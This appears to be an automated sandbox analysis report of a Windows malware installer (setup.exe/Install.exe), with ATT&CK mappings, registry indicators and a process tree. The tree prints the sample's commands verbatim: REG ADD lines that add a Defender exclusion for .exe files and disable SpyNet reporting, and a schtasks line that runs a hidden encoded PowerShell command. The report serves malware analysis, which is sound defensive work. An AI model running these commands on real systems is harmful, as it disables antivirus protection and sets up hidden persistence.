f6933b70a82f621c116566015c6e2ee758f276b40cdd45f09ac32ec4a23b0148

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	Install.exe

Executes dropped EXE 2 IoCs

pid	Process
4012	Install.exe
492	Install.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2076	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 3128 wrote to memory of 4012	3128	setup.exe	85
PID 3128 wrote to memory of 4012	3128	setup.exe	85
PID 3128 wrote to memory of 4012	3128	setup.exe	85
PID 4012 wrote to memory of 492	4012	Install.exe	87
PID 4012 wrote to memory of 492	4012	Install.exe	87
PID 4012 wrote to memory of 492	4012	Install.exe	87
PID 492 wrote to memory of 4916	492	Install.exe	94
PID 492 wrote to memory of 4916	492	Install.exe	94
PID 492 wrote to memory of 4916	492	Install.exe	94
PID 492 wrote to memory of 3900	492	Install.exe	96
PID 492 wrote to memory of 3900	492	Install.exe	96
PID 492 wrote to memory of 3900	492	Install.exe	96
PID 4916 wrote to memory of 3036	4916	forfiles.exe	98
PID 4916 wrote to memory of 3036	4916	forfiles.exe	98
PID 4916 wrote to memory of 3036	4916	forfiles.exe	98
PID 3036 wrote to memory of 4540	3036	cmd.exe	99
PID 3036 wrote to memory of 4540	3036	cmd.exe	99
PID 3036 wrote to memory of 4540	3036	cmd.exe	99
PID 3900 wrote to memory of 1516	3900	forfiles.exe	100
PID 3900 wrote to memory of 1516	3900	forfiles.exe	100
PID 3900 wrote to memory of 1516	3900	forfiles.exe	100
PID 3036 wrote to memory of 2912	3036	cmd.exe	101
PID 3036 wrote to memory of 2912	3036	cmd.exe	101
PID 3036 wrote to memory of 2912	3036	cmd.exe	101
PID 1516 wrote to memory of 3528	1516	cmd.exe	102
PID 1516 wrote to memory of 3528	1516	cmd.exe	102
PID 1516 wrote to memory of 3528	1516	cmd.exe	102
PID 1516 wrote to memory of 2196	1516	cmd.exe	103
PID 1516 wrote to memory of 2196	1516	cmd.exe	103
PID 1516 wrote to memory of 2196	1516	cmd.exe	103
PID 492 wrote to memory of 2076	492	Install.exe	104
PID 492 wrote to memory of 2076	492	Install.exe	104
PID 492 wrote to memory of 2076	492	Install.exe	104
PID 492 wrote to memory of 964	492	Install.exe	107
PID 492 wrote to memory of 964	492	Install.exe	107
PID 492 wrote to memory of 964	492	Install.exe	107

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3128
- C:\Users\Admin\AppData\Local\Temp\7zS9E43.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4012
- - C:\Users\Admin\AppData\Local\Temp\7zSA0A5.tmp\Install.exe
    .\Install.exe /jyafdidIl "385118" /S
    3⤵
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:492
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4916
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3036
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:4540
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:2912
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3900
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1516
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:3528
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:2196
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gnHELzAgQ" /SC once /ST 01:40:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:2076
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gnHELzAgQ"
      4⤵
      PID:964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Scheduled Task/Job

Privilege Escalation

Scheduled Task/Job

Defense Evasion

Credential Access

Discovery

Query Registry

System Information Discovery